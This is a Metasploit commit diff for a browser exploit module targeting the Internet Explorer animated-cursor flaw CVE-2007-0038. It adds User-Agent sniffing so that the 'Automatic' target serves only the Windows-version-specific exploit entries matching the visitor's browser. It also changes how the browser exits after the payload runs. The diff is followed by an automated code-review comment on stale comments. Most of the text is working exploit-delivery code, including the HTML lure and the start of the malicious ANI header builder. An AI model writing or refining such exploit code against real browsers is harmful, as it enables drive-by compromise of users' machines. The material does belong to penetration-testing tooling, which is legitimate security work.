Automatic target detection based on the user agent
git-svn-id: file:///home/svn/framework3/trunk@4600 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
f0fcedf728
commit
775d8bc95b
|
@ -55,8 +55,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
# Cause the shellcode to exit silently
|
||||
'EXITFUNC' => 'seh',
|
||||
# Cause internet explorer to exit after the code hits
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -75,7 +75,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
# Use multiple cursor URLs to try all targets at once
|
||||
# This can result in multiple, sequential sessions
|
||||
#
|
||||
[ 'All Targets', { }],
|
||||
[ 'Automatic', { }],
|
||||
|
||||
#
|
||||
# The following targets use call [ebx+4], just like the original exploit
|
||||
|
@ -126,6 +126,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
ros = /.*/
|
||||
|
||||
case request.headers['User-Agent']
|
||||
|
||||
when /Windows (NT |)4\.0/
|
||||
ros = /NT 4/
|
||||
|
||||
when /Windows (NT |)5\.0/
|
||||
ros = /2000/
|
||||
|
||||
when /Windows (NT |)5\.1/
|
||||
ros = /XP/
|
||||
|
||||
when /Windows (NT |)5\.2/
|
||||
ros = /2003/
|
||||
|
||||
when /Windows (NT |)6\.0/
|
||||
ros = /Vista/
|
||||
end
|
||||
|
||||
|
||||
targ = nil
|
||||
exts = ['bmp', 'wav', 'png', 'zip', 'tar']
|
||||
gext = exts[rand(exts.length)]
|
||||
|
@ -138,7 +159,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
mext = ruri =~ /\.(...)$/
|
||||
if (not (mext and exts.include?($1)))
|
||||
|
||||
|
||||
html =
|
||||
"<html><head><title>" +
|
||||
rand_text_alphanumeric(rand(128)+4) +
|
||||
|
@ -147,10 +168,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
mytargs = (target.name =~ /All Targets/) ? targets : [target]
|
||||
|
||||
if target.name =~ /All Targets/
|
||||
if target.name =~ /Automatic/
|
||||
targets.each_index { |i|
|
||||
next if not targets[i].ret
|
||||
|
||||
next if not targets[i].name =~ ros
|
||||
html << generate_div(gext, i)
|
||||
}
|
||||
else
|
||||
|
@ -201,7 +222,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def generate_ani(payload, target)
|
||||
|
||||
|
||||
# Build the first ANI header
|
||||
anih_a = [
|
||||
36, # DWORD cbSizeof
|
||||
|
|
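Review bot: The comment above the renamed target entry still reads `# Use multiple cursor URLs to try all targets at once`, but with the added `next if not targets[i].name =~ ros` filter the 'Automatic' entry only emits targets whose name matches the OS token taken from the User-Agent. The context line `mytargs = (target.name =~ /All Targets/) ? targets : [target]` also still tests the old name, so after the rename it can only evaluate to `[target]`; where `mytargs` is used lies outside the visible hunks, so it should be checked against the rename or dropped if unused. I would reword the target comment to `# Select targets by the Windows version reported in the User-Agent` and add `# ros: regex applied to target names; stays /.*/ (every target with a ret) when the User-Agent names no known Windows version` above `ros = /.*/`, since the `case` has no `else` and that fallback is easy to miss. The User-Agent is client-supplied, so the comment should describe the selection as a heuristic rather than a reliable identification.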